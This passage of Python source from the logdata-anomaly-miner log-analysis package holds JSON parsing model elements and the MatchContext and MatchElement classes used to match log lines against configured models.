match_context.update(match_context.match_data) if len(matches) == 0: resulting_matches = None else: resulting_matches = matches return MatchElement(current_path, str(json_match_data).encode(), json_match_data, resulting_matches) def parse_json_dict(self, json_dict: dict, json_match_data: dict, current_path: str, match_context): """Parse a json dictionary.""" matches: List[Union[MatchElement, None]] = [] if not self.check_keys(json_dict, json_match_data, match_context): return [None] for i, key in enumerate(json_match_data.keys()): split_key = key key = self.get_full_key(key, json_dict) if key not in json_dict: index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 2" + key + str(json_dict)) if "ALLOW_ALL_KEYS" in json_dict.keys(): key = "ALLOW_ALL_KEYS" elif self.allow_all_fields: index = match_context.match_data.find(key.encode()) + len(key.encode()) index += len(match_context.match_data) - len(match_context.match_data[index:].lstrip(b' \n\t:"')) + \ len(str(json_match_data[key])) match_context.update(match_context.match_data[:index]) if match_context.match_data.replace(b"}", b"").replace(b"]", b"").replace(b'"', b"") == b"": match_context.update(match_context.match_data) continue else: return [None] value = json_dict[key] if isinstance(value, (dict, list)) and (not isinstance(json_match_data, dict) or split_key not in json_match_data): logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 3, Key: " + split_key + ", Value: " + repr(value)) return [None] if isinstance(value, dict): if json_match_data[split_key] is None and (self.is_nullable_key(key) or json_dict[key] == "NULL_OBJECT"): data = b"null" matches.append(MatchElement(current_path, data, data, None)) index = match_context.match_data.find(data) if match_context.match_data[index + 4] == 34: # " index += 1 match_context.update(match_context.match_data[:index + 
len(data)]) return matches matches += self.parse_json_dict(value, json_match_data[split_key], f"{current_path}/{split_key}", match_context) if json_match_data[split_key] == {}: index = match_context.match_data.find(split_key.encode()) index = match_context.match_data.find(b"}", index) match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) matches.append(match_element) match_context.update(match_context.match_data[:index]) if len(matches) == 0 or matches[-1] is None: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches elif isinstance(value, list): res = self.parse_json_array(json_dict, json_match_data, key, split_key, current_path, matches, match_context, i) if res is not None: return res elif value == "EMPTY_OBJECT": if isinstance(json_match_data[split_key], dict) and len(json_match_data[split_key].keys()) == 0: index = match_context.match_data.find(b"}") + 1 match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) matches.append(match_element) match_context.update(match_context.match_data[:index]) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_OBJECT " + split_key + " is not empty. Keys: " + str(json_match_data[split_key].keys())) matches.append(None) elif json_dict[key] == "EMPTY_ARRAY": if isinstance(json_match_data[split_key], list) and len(json_match_data[split_key]) == 0: index = match_context.match_data.find(b"]") + 1 match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) matches.append(match_element) match_context.update(match_context.match_data[:index]) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_ARRAY " + split_key + " is not empty. 
Data: " + str(json_match_data[split_key])) matches.append(None) else: if key != split_key and split_key not in json_match_data: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + f"Optional Key {key} not found in json_match_data") continue if split_key not in json_match_data: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Key {split_key} not found in json_match_data. RETURN [NONE] 4") return [None] match_element, index, data = self.parse_json_object(json_dict, json_match_data, key, split_key, current_path, match_context) matches.append(match_element) if index == -1 and match_element is None: backslash = b"\\" logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Necessary element did not match! Key: {key}, MatchElement: {match_element}, Data: " f"{data.decode()}, IsFloat {isinstance(json_match_data[split_key], float)}, Index: {index}, " f"MatchContext: {match_context.match_data.replace(backslash, b'').decode()}") return matches match_context.update(match_context.match_data[:index + len(data)]) missing_keys = [x for x in json_dict if self.get_stripped_key(x) not in json_match_data and x != "ALLOW_ALL_KEYS" and not (x.startswith(self.optional_key_prefix) or x.startswith(self.nullable_key_prefix + self.optional_key_prefix))] for key in missing_keys: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "Missing Key: " + key) return [None] return matches def check_keys(self, json_dict, json_match_data, match_context): """Check if no keys are missing and if the value types match.""" if "ALLOW_ALL_KEYS" in json_dict.keys(): return True if json_match_data is None: return False missing_keys = [x for x in json_dict if self.get_stripped_key(x) not in json_match_data and not (x.startswith( self.optional_key_prefix) or x.startswith(self.nullable_key_prefix + self.optional_key_prefix))] for key in missing_keys: if (not key.startswith(self.nullable_key_prefix) or ( key.startswith(self.nullable_key_prefix) and 
key[len(self.nullable_key_prefix):] not in json_match_data)): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 1. Key: " + key) return False for key in json_dict.keys(): k = self.get_stripped_key(key) if not isinstance(json_match_data, dict) or (k in json_match_data and isinstance(json_match_data[k], list) and not isinstance( json_dict[key], list) and json_dict[key] != "EMPTY_ARRAY"): index = match_context.match_data.find(key.encode()) match_context.update(match_context.match_data[:index]) logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN [NONE] 5. Key: " + key) return False return True def flatten_list(self, lst: list): """Flatten a list of lists using this method recursively.""" if not isinstance(lst, list): return None res: List[Any] = [] for val in lst: if isinstance(val, list): res += self.flatten_list(val) else: res.append(val) return res def parse_json_array(self, json_dict: dict, json_match_data: dict, key: str, split_key: str, current_path: str, matches: list, match_context, i: int): """Parse an array in a json object.""" if self.is_nullable_key(key) and json_match_data[split_key] is None: return None if not isinstance(json_match_data[split_key], list): if key.startswith(self.optional_key_prefix) and json_match_data[split_key] is None: data = b"null" index = match_context.match_data.find(split_key.encode() + b'":') + len(split_key.encode() + b'":') index += match_context.match_data[index:].find(b"null") + len(b"null") match_context.update(match_context.match_data[:index]) matches.append(MatchElement(current_path, data, data, None)) return matches logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "Key " + split_key + " is no array. 
Data: " + str(json_match_data[split_key])) return [None] search_string = b"]" match_array = self.flatten_list(json_match_data[split_key]) value = self.flatten_list(json_dict[key]) for j, data in enumerate(match_array): for k, val in enumerate(value): if isinstance(data, str): enc = "utf-8" if self.is_escaped_unicode(data) and self.dec_escapes: enc = "unicode-escape" data = data.encode(enc) if data is None: data = b"null" elif not isinstance(data, bytes): data = str(data).encode() if isinstance(val, dict): # skipcq: PYL-R1723 matches += self.parse_json_dict( val, match_array[j], f"{current_path}/{split_key}", match_context) if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "No match found for key " + split_key) return matches del matches[-1] continue break else: if val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "ALLOW_ALL (ARRAY)") match_element = MatchElement(current_path+"/"+key, data, data, None) elif json_dict[key] == "EMPTY_ARRAY": if isinstance(data, list) and len(data) == 0: index = match_context.match_data.find(search_string) match_element = MatchElement( current_path+"/"+key, match_context.match_data[:index], match_context.match_data[:index], None) match_context.update(match_context.match_data[:index]) else: logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "EMPTY_ARRAY " + split_key + " is not empty. Data: " + json_match_data[split_key]) return None else: match_element = val.get_match_element(current_path, MatchContext(data)) if match_element is not None and len(match_element.match_string) != len(data): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "MatchElement NONE 1. match_string: " + match_element.match_string.decode() + ", data: " + data.decode()) match_element = None index = match_context.match_data.find(data) if match_element is None: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "MatchElement NONE 2. 
Data: " + data.decode()) index = -1 match_context.update(match_context.match_data[:index + len(data)]) if index == -1 and val == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + "ALLOW_ALL (ARRAY-ELEMENT). Data: " + match_context.match_data.decode()) index = match_context.match_data.find(search_string) match_context.update(match_context.match_data[:index]) if match_element is not None or (match_element is None and not key.startswith(self.optional_key_prefix)): matches.append(match_element) if index == -1: if len(value) - 1 == k: return matches del matches[-1] continue if len(matches) == 0: return [None] if matches[-1] is None: if len(value) - 1 == k: logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN MATCHES 3") return matches del matches[-1] continue if len(json_match_data.keys()) > i + 1: match_context.update(match_context.match_data[:match_context.match_data.find( list(json_match_data.keys())[i + 1].encode())]) else: match_context.update(match_context.match_data[:match_context.match_data.find(search_string) + len(search_string)]) return None def parse_json_object(self, json_dict, json_match_data, key, split_key, current_path, match_context): # skipcq: PYL-R0201 """Parse a literal from the json object.""" data = json_match_data[split_key] enc = "utf-8" if isinstance(data, str): if self.is_escaped_unicode(data) and self.dec_escapes: enc = "unicode-escape" data = data.encode(enc) elif isinstance(data, bool): data = str(data).replace("T", "t").replace("F", "f").encode() elif data is None: data = b"null" if self.is_nullable_key(key) or json_dict[key] == "NULL_OBJECT": start = 0 if "null" in key: start = match_context.match_data.find(data) + 4 index = match_context.match_data.find(data, start) if match_context.match_data[index + 4] == 34: index += 1 return MatchElement(current_path, data, data, None), index, data return None, -1, data elif not isinstance(data, bytes): data = str(data).encode() if json_dict[key] == "ALLOW_ALL": 
logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "ALLOW_ALL (DICT)\n" + data.decode()) match_element = MatchElement(current_path, data, data, None) last_bracket = match_context.match_data.find(b"}", len(data)) while match_context.match_data.count(b"{", 0, last_bracket) - match_context.match_data.count(b"}", 0, last_bracket) > 0: last_bracket = match_context.match_data.find(b"}", last_bracket) + 1 index = last_bracket - len(data) elif json_dict[key] == "EMPTY_STRING": if data == b"": match_element = MatchElement(current_path, data, data, None) index = match_context.match_data.find(split_key.encode()) + len(split_key) index += match_context.match_data[index:].find(b'""') + len(b'""') else: match_element = None index = -1 else: match_element = json_dict[key].get_match_element(current_path, MatchContext(data)) if match_element is not None and len(match_element.match_string) != len(data) and ( not isinstance(match_element.match_object, bytes) or len(match_element.match_object) != len(data)): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Data length not matching! 
match_string: {len(match_element.match_string)}, data: {len(data)}," f" data: {data.decode()}") match_element = None index = max([match_context.match_data.replace(b"\\", b"").find(split_key.encode()), match_context.match_data.find(split_key.encode()), match_context.match_data.decode().find(split_key)]) index += match_context.match_data[index:].find(split_key.encode() + b'":') + len(split_key.encode() + b'":') try: index += max([match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data), match_context.match_data.decode(enc)[index:].find(data.decode(enc))]) except UnicodeDecodeError: index += max([match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data), match_context.match_data.decode()[index:].find(data.decode())]) index += len(match_context.match_data[index:]) - len(match_context.match_data[index:].lstrip(b" \r\t\n")) if match_context.match_data[index:].find(b'"') == 0: index += len(b'"') # for example float scientific representation is converted to normal float.. if index == -1 and match_element is not None and isinstance(json_match_data[split_key], float): indices = [match_context.match_data.find(b",", len(match_element.match_string) // 3), match_context.match_data.find(b"]"), match_context.match_data.find(b"}")] indices = [x for x in indices if x >= 0] index = min(indices) if match_element is None: index = -1 return match_element, index, data JsonStringModelElement.py000066400000000000000000000224541437606560100355470ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element for parsing json strings This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
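import logging
import orjson
from collections import deque
from typing import Any
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ModelElementInterface import ModelElementInterface


class JsonAccessObject:
    """
    Flattened view of a (nested) dictionary.

    The constructor takes a dictionary "d" and flattens it to dotted keys such as
    key.another_key.somelist[0].foo = bar. Each flattened key becomes an entry of self.collection of the form
    collection[flattened_key] = {"levels": deque, "value": value}, where "levels" is the path of keys and list
    indices leading to the value.
    """

    def __init__(self, d: dict):
        """
        Flatten d immediately into self.collection.

        @param d the dictionary to flatten; values may be nested dicts, lists or scalars.
        """
        self.debug: bool = False  # when True every entry is printed while flattening
        self.levels: deque = deque()  # path currently being descended; copied into each entry
        self.delimiter: str = '.'
        self.collection: dict = {}
        self.flatten(d)

    def join_levels(self):
        """Join self.levels with the delimiter; list index levels ("[n]") attach without a delimiter."""
        ret = ""
        for level in self.levels:
            if not level.startswith("[") and len(ret) != 0:
                ret += self.delimiter
            ret += level
        return ret

    def create_collection_entry(self, index: str, levels: deque, value):
        """Store value under the flattened key index, together with a copy of the levels path that led to it."""
        self.collection[index] = {'levels': levels.copy(), 'value': value}

    def flatten(self, d: Any, islist=-1):
        """
        Recursively flatten d into self.collection.

        @param d a dict when islist is -1, otherwise a list.
        @param islist -1 selects dict mode; otherwise it is the index the next list element is named with.
        """
        if islist > -1:
            for element in d:
                if isinstance(element, dict):
                    self.levels.append(f"[{islist}]")
                    islist = islist + 1
                    self.flatten(element)
                    self.levels.pop()
                elif isinstance(element, list):
                    # Nested list: index it like a nested dict, so its entries become key[i][j].
                    # The previous code passed the builtin type `list` as islist here, which raised a TypeError
                    # on the "islist > -1" comparison for any list nested inside a list.
                    self.levels.append(f"[{islist}]")
                    islist = islist + 1
                    self.flatten(element, 0)
                    self.levels.pop()
                else:
                    if self.debug:
                        print(f"{ self.join_levels() }[{ islist }]: { element }")
                    self.create_collection_entry("%s[%d]" % (self.join_levels(), islist), self.levels, element)
                    islist = islist + 1
        else:
            for (k, v) in d.items():
                if isinstance(v, dict):
                    self.levels.append(k)
                    self.flatten(v)
                    if len(self.levels) != 0:
                        self.levels.pop()
                elif isinstance(v, list):
                    self.levels.append(k)
                    self.flatten(v, 0)
                    if len(self.levels) != 0:
                        self.levels.pop()
                elif len(self.levels) == 0:
                    # top-level scalar: the key itself is the flattened key
                    if self.debug:
                        print(f"{ k } : { v }")
                    self.create_collection_entry(k, deque([k]), v)
                else:
                    # nested scalar (this branch only runs in dict mode, so no list index is appended here)
                    self.levels.append(k)
                    if self.debug:
                        print(f"{ self.join_levels() } : { v }")
                    self.create_collection_entry(self.join_levels(), self.levels, v)
                    self.levels.pop()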
dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.jao = JsonAccessObject(key_parser_dict) if not isinstance(element_id, str): msg = "element_id has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(element_id) < 1: msg = "element_id must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.element_id = element_id self.fill_children() super().__init__(element_id, key_parser_dict=key_parser_dict, strict_mode=strict_mode, ignore_null=ignore_null) def fill_children(self): """creates list of children from config-json""" for entry in self.jao.collection.values(): self.children.append(entry['value']) def get_id(self): """Get the element ID.""" return self.element_id def get_child_elements(self): # skipcq: PYL-R0201 """ Get all possible child model elements of this element. @return None as there are no children of this element. """ return self.children def get_match_element(self, path: str, match_context): """Just return a match including all data from the context.""" current_path = f"{ path }/ { self.element_id }" logging.getLogger(DEBUG_LOG_NAME).info("JsonStringModelElement %s/%s", path, match_context.match_data.decode('utf-8')) matches = [] try: jdict = orjson.loads(match_context.match_data) if self.strict_mode: jdictjao = JsonAccessObject(jdict) if len(jdictjao.collection) != len(self.jao.collection): msg = "JsonStringModelElement-subparser-error: " msg += "strict mode enabled and fields detected that do not exist in parser-config" logging.getLogger(DEBUG_LOG_NAME).debug(msg) return None try: for (k, v) in self.jao.collection.items(): # empty string if value is null parse_line = b"" if jdictjao.collection[k]['value'] is not None: parse_line = str(jdictjao.collection[k]['value']).encode('utf-8') else: if self.ignore_null: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement: ignore null at %s", k) continue child_match = 
v['value'].get_match_element(current_path, MatchContext(parse_line)) if child_match is None: msg = "JsonStringModelElement-subparser-error: %s -> %s" logging.getLogger(DEBUG_LOG_NAME).debug(msg, k, str(jdictjao.collection[k]['value'])) return None matches += [child_match] except KeyError: msg = "JsonStringModelElement-subparser-error: field \"%s\" not found but strict-enabled" logging.getLogger(DEBUG_LOG_NAME).debug(msg, k) return None else: for (k, v) in self.jao.collection.items(): tmp = jdict.copy() try: for level in v['levels']: tmp = tmp[level] except KeyError: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement-subparser: %s not found", k) parse_line = b"" # empty string if value is null if tmp is not None: parse_line = str(tmp).encode('utf-8') else: if self.ignore_null: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement: ignore null at %s", k) continue child_match = v['value'].get_match_element(current_path, MatchContext(parse_line)) if child_match is None: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement-subparser-error: %s -> %s", k, tmp) return None matches += [child_match] except orjson.JSONDecodeError as exception: msg = f"JsonStringModelElement { exception }: { match_context.match_data.decode('utf-8') }" logging.getLogger(DEBUG_LOG_NAME).error(msg) return None match_data = match_context.match_data if not match_data: return None match_context.update(match_data) return MatchElement(current_path, match_data, match_data, matches) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/MatchContext.py000066400000000000000000000112621437606560100336270ustar00rootroot00000000000000""" This module defines the match context. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging
from typing import Union
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer import AminerConfig


class MatchContext:
    """
    This class allows storage of data relevant during the matching process, e.g. the root node and the remaining unmatched data.
    When searching for non-atomic matches, e.g. sequences, the context might be modified by model subelements, even if the main
    model element will not return a match. In that case, those non-atomic model elements have to care to restore the context
    before returning.
    """

    def __init__(self, match_data: bytes):
        """
        Create a MatchContext with the full unmatched string data.
        @param match_data the data that will be tested by the next model element.
        @raise TypeError if match_data is not of type bytes.
        """
        if not isinstance(match_data, bytes):
            msg = "match_data has to be of the type bytes."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # The data still to be matched; shortened by update().
        self.match_data = match_data

    def update(self, match_string: bytes):
        """
        Update the match context by removing the given matched string data from the context data still to be matched.
        This method does not check, if the removed data is the same as the trailing match data for performance reasons.
        This is done only in the DebugMatchContext class.
        @param match_string the bytes consumed by the current match; only its length is used here.
        """
        self.match_data = self.match_data[len(match_string):]


class DebugMatchContext(MatchContext):
    """This class defines a slower MatchContext for debugging purposes."""

    def __init__(self, match_data: bytes):
        """
        Create a DebugMatchContext.
        @param match_data the data that will be tested by the next model element.
        """
        # Human readable trace of all updates, returned and reset by get_debug_info().
        self.debug_info = ""
        # match_data as it was at the end of the previous update(); used to detect a new update series.
        self.last_match_data: Union[None, bytes] = None
        # The shortest remaining data seen so far, i.e. how far parsing got.
        self.shortest_unmatched_data = match_data
        super(DebugMatchContext, self).__init__(match_data)

    def update(self, match_string: bytes):
        """
        Update the context and store debugging information.
        Unlike MatchContext.update(), this verifies that match_data really starts with match_string.
        @param match_string the bytes consumed by the current match.
        @raise TypeError if match_string is not of type bytes.
        @raise ValueError if match_data does not start with match_string.
        """
        if not isinstance(match_string, bytes):
            msg = "match_string has to be of the type bytes."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(match_string) < 1:
            return
        # Decoded copies for the trace only; fall back to repr() for undecodable bytes.
        try:
            match_data = self.match_data.decode(AminerConfig.ENCODING)
            m_string = match_string.decode(AminerConfig.ENCODING)
        except UnicodeError:
            match_data = repr(self.match_data)
            m_string = repr(match_string)
        if self.last_match_data != self.match_data:
            self.last_match_data = self.match_data
            if self.debug_info != "":
                self.debug_info += " "
            self.debug_info += f'Starting match update on "{match_data}"\n'
        if not self.match_data.startswith(match_string):
            self.debug_info += f' Current data {match_data} does not start with "{m_string}"\n'
            msg = "Illegal state"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.match_data = self.match_data[len(match_string):]
        self.last_match_data = self.match_data
        if (self.shortest_unmatched_data is None) or (len(self.match_data) < len(self.shortest_unmatched_data)):
            self.shortest_unmatched_data = self.match_data
        self.debug_info += f' Removed: "{m_string}", remaining {len(self.match_data)} bytes\n'

    def get_debug_info(self):
        """
        Get the current debugging information and reset it.
        Consecutive blank lines are collapsed and the shortest unmatched data is appended.
        @return the collected trace as a string.
        """
        while self.debug_info.find("\n\n") != -1:
            self.debug_info = self.debug_info.replace("\n\n", "\n")
        result = self.debug_info
        self.debug_info = ""
        try:
            data = self.shortest_unmatched_data.decode(AminerConfig.ENCODING)
        except UnicodeError:
            data = repr(self.shortest_unmatched_data)
        result += f' Shortest unmatched data: "{data}"\n'
        return result

    def get_shortest_unmatched_data(self):
        """
        Get the shortest match_data found while updating the internal state.
        This is useful to find out where the parsing process has terminated.
        """
        return self.shortest_unmatched_data
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/MatchElement.py000066400000000000000000000144001437606560100335710ustar00rootroot00000000000000
"""
This module provides only the MatchElement class to store results from parser element matching process.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging
from typing import Any, List, Union
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer import AminerConfig


class MatchElement:
    """This class allows storage and handling of data related to a match found by a model element."""

    def __init__(self, path: Union[str, None], match_string: bytes, match_object: Any, children: Union[List["MatchElement"], None]):
        """
        Initialize the MatchElement.
        @param path when None, this element is anonymous. Hence, it cannot be added to the result data and cannot have children.
        @param match_string the part of the input bytes string covered by the given match.
        @param match_object the matchString converted to an object for matchers detecting more complex data types, e.g.,
               integer numbers or IP addresses.
        @param children list of MatchElements which matched in the process, or None. An empty list is rejected.
        @raise TypeError if path, match_string or children (or one of its elements) has the wrong type.
        @raise ValueError if an anonymous match has children or the children list is empty.
"""
        if not isinstance(path, str) and path is not None:
            msg = "path has to be of the type string or None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # An anonymous (None / empty) path must not carry children.
        if (not path) and children:
            msg = "Anonymous match may not have children"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.path = path
        if not isinstance(match_string, bytes):
            msg = "match_string has to be of the type bytes."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.match_string = match_string
        self.match_object = match_object
        if not isinstance(children, list) and children is not None:
            msg = "children has to be of the type list or None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if isinstance(children, list):
            # A list is only accepted when non-empty; callers without children have to pass None.
            if len(children) < 1:
                msg = "children must not be empty."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            for child in children:
                if not isinstance(child, MatchElement):
                    msg = "children have to be of the type MatchElement."
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise TypeError(msg)
        self.children = children

    def get_path(self):
        """Get the path of this element."""
        return self.path

    def get_match_string(self):
        """Get the log_atom string part this match element is matching."""
        return self.match_string

    def get_match_object(self):
        """Get the matched data converted to an object of suitable type."""
        return self.match_object

    def get_children(self):
        """Get the submatch children of this match, if any."""
        return self.children

    def annotate_match(self, indent_str: Union[str, None]):
        """
        Annotate a given match element showing the match path elements and the parsed values.
        @param indent_str if None, all elements are separated just with a single space, no matter how deep the nesting level of
               those elements is. If not None, all elements are put into an own line, that is prefixed by the given indent_str and
               indenting is increased for each level.
        @return the annotation as a string; bytes match objects are decoded with AminerConfig.ENCODING, everything else uses repr().
        @raise TypeError if indent_str is neither a string nor None.
        """
        next_indent = None
        if not isinstance(indent_str, str) and indent_str is not None:
            msg = "indent_str has to be of the type string or None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        try:
            if isinstance(self.match_object, bytes):
                data = self.match_object.decode(AminerConfig.ENCODING)
            else:
                data = repr(self.match_object)
        except UnicodeError:
            # Undecodable bytes are shown in their escaped repr() form instead of failing.
            data = repr(self.match_object)
        if indent_str is None:
            result = f"{self.path}: {data}"
        else:
            result = f"{indent_str}{self.path}: {data}"
            next_indent = indent_str + " "
        if self.children is not None:
            for child_match in self.children:
                if next_indent is None:
                    result += " " + child_match.annotate_match(None)
                else:
                    result += "\n" + child_match.annotate_match(next_indent)
        return result

    def serialize_object(self):
        """
        Create a serialization of this match element and all the children.
        With sane and unique path elements, the serialized object will also be unique.
        @return a dict with the keys "path", "match_object", "match_string" and "children" (a list of serialized children,
                empty when there are none).
        """
        children = []
        if self.children:
            for child_match in self.children:
                children.append(child_match.serialize_object())
        return {"path": self.path, "match_object": self.match_object, "match_string": self.match_string, "children": children}

    def __str__(self):
        """Get a string representation of this match element excluding the children."""
        num_children = 0
        if self.children is not None:
            num_children = len(self.children)
        try:
            match_string = self.match_string.decode(AminerConfig.ENCODING)
            if isinstance(self.match_object, bytes):
                match_object = self.match_object.decode(AminerConfig.ENCODING)
            else:
                match_object = repr(self.match_object)
        except UnicodeError:
            # If either decode fails, both values fall back to repr().
            match_string = repr(self.match_string)
            match_object = repr(self.match_object)
        return f"MatchElement: path = {self.path}, string = {match_string}, object = {match_object}, children = {num_children}"
ModelElementInterface.py000066400000000000000000000574601437606560100353520ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing
"""This module defines various
interfaces for log atom parsing and namespace shortcuts to the ModelElements. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc import locale import logging import re from aminer.AminerConfig import DEBUG_LOG_NAME SIGN_TYPE_NONE = "none" SIGN_TYPE_OPTIONAL = "optional" SIGN_TYPE_MANDATORY = "mandatory" PAD_TYPE_NONE = "none" PAD_TYPE_ZERO = "zero" PAD_TYPE_BLANK = "blank" EXP_TYPE_NONE = "none" EXP_TYPE_OPTIONAL = "optional" EXP_TYPE_MANDATORY = "mandatory" class ModelElementInterface(metaclass=abc.ABCMeta): """This is the superinterface of all model elements.""" def __init__(self, element_id, **kwargs): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param date_format, is a byte string that represents the date format for parsing, see Python strptime specification for available formats. Supported format specifiers are: * %b: month name in current locale * %d: day in month, can be space or zero padded when followed by separator or at end of string. * %f: fraction of seconds (the digits after the the ".") * %H: hours from 00 to 23 * %M: minutes * %m: two digit month number * %S: seconds * %s: seconds since the epoch (1970-01-01) * %Y: 4 digit year number * %z: detect and parse timezone strings like UTC, CET, +0001, etc. automatically. Common formats are: * "%b %d %H:%M:%S" e.g. for "Nov 19 05:08:43" * "%d.%m.%YT%H:%M:%S" e.g. 
for "07.02.2019T11:40:00" * "%d.%m.%Y %H:%M:%S.%f" e.g. for "07.02.2019 11:40:00.123456" * "%d.%m.%Y %H:%M:%S%z" e.g. for "07.02.2019 11:40:00+0000" or "07.02.2019 11:40:00 UTC" * "%d.%m.%Y" e.g. for "07.02.2019" * "%H:%M:%S" e.g. for "11:40:23" @param time_zone the timezone for parsing the values or UTC when None. @param text_locale the locale to use for parsing the day, month names or None to use the default locale. The locale must be a tuple of (locale, encoding) or a string. @param start_year when parsing date records without any year information, assume this is the year of the first value parsed. @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of values has to be tracked. This value defines the window within that the time may jump between two matches. When not within that window, the value is still parsed, corrected to the most likely value but does not change the detection year. @param timestamp_scale scales the seconds in %s to get seconds (=1), milliseconds (=1000), microseconds (=1000000), etc. @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed, with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -. @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value. @param exponent_type defines the allowed types of exponential values. With EXP_TYPE_NONE no exponential values are allowed, EXP_TYPE_OPTIONAL allows exponential values and with EXP_TYPE_MANDATORY every value must contain exponential values. @param delimiter a non-escaped delimiter string to search for. @param escape a character to escape in the string. 
